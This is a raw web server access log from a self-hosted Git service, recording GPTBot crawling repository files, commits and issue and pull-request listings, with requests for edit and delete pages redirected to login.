"/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:52:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:18:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:18:52:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:18:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:18:52:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:18:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:18:52:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:18:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:18:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:18:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 1015] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:18:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10121] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:18:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?state=open&type=all" [Client 74.7.227.38] [Length 9941] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:18:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?state=open&type=all" [Client 74.7.227.38] [Length 10112] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:18:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13509] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:18:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" [Client 74.7.227.38] [Length 9926] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__pycache__%2f__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 20826] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:18:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" +[17/Feb/2026:18:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:18:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9953] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat?display=rendered" [Client 74.7.227.38] [Length 11251] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:18:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=closed&type=all" +[17/Feb/2026:18:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 15573] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" +[17/Feb/2026:18:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 13782] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" +[17/Feb/2026:18:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12996] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" +[17/Feb/2026:18:52:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:52:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr 